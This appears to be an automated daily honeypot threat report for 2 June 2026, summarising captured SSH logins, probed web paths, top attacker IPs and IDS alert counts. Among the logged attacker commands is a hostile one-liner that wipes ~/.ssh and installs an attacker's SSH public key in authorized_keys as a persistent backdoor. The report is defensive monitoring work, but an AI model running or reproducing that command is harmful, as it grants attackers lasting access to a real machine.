Tuesday, 2 June 2026 πŸ’€ critical

Daily Threat Report

1,178 SSH Connections
1,080 Login Attempts
421 Commands Run
84 SSH Unique IPs
16,063 Protocol Events
24 Protocol IPs
78 Web Hits
33 Web Service IPs

Top Attacker IPs

  1. 🌐 47.239.112.32 BGPβ†—
  2. 🌐 87.251.64.176 BGPβ†—
  3. 🌐 116.110.154.109 BGPβ†—
  4. 🌐 27.79.45.38 BGPβ†—
  5. 🌐 185.246.128.133 BGPβ†—

Top Passwords Tried

  1. 0
  2. admin
  3. 123456
  4. 1234
  5. ubuntu

🌐 WEB HONEYPOT β€” HoneyAI HTTP

AI-generated fake HTTP responses served to 78 scanner requests from 33 unique IPs (local, offline).

Top Paths Probed

  1. /SDK/webLanguage
  2. /
  3. /favicon.ico
  4. /sonicui/7/sslvpn-portal/
  5. /server

Top User-Agents

  1. Mozilla/5.0 (Windows NT 10.0
  2. Win64
  3. x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
  4. Mozilla/5.0 (Macintosh
  5. Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
  6. Mozilla/5.0 (compatible
  7. Infrawatch/1.0
  8. +https://infrawat.ch/)
  9. Mozilla/5.0 (X11
  10. Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
  11. Mozilla/5.0 (Macintosh
  12. Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36

🀣 ATTACKER COMEDY CORNER

Real attempts. No actors were harmed in the making of this honeypot.

πŸ”‘ Hall of Shame β€” Passwords

admin
ubuntu
Q1w2e3r4
password
345gs5662d34

πŸ’» Commands They Tried

/bin/./uname -s -v -n -r -m
cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
uname -s -m
uname -s -v -n -r -m

These are real credentials and commands attempted by automated scanners and script kiddies. Logged, reported, and immortalized.

Automated report for 2 de June de 2026. Recorded 1178 SSH connections on the Cowrie honeypot and 16063 multi-protocol events on OpenCanary, from 108 unique IPs. 0 IPs were automatically reported to the AbuseIPDB community database.

SSH Activity (Cowrie)

The SSH honeypot received 1080 login attempts from 84 unique IPs. Attackers executed 421 commands after gaining simulated system access.

Multi-Protocol Activity (OpenCanary)

Detected 16063 events across services including FTP, Telnet, MySQL, Redis, VNC and Git from 24 distinct IPs. All events are access attempts against simulated production services.

HTTP Web Honeypot (Galah LLM)

The web honeypot received 78 HTTP requests from real scanners across 33 unique IPs. Each attacker received a fake response generated in real time by the local AI model qwen2.5:0.5b (Ollama, no internet connection required).

Network IDS (Suricata)

The network intrusion detection system generated 11109 alerts from 354 unique source IPs. Suricata monitors all traffic on the primary network interface using Emerging Threats + AlienVault OTX rulesets.

← All Reports πŸ›‘οΈ Subscribe to blocklists β†’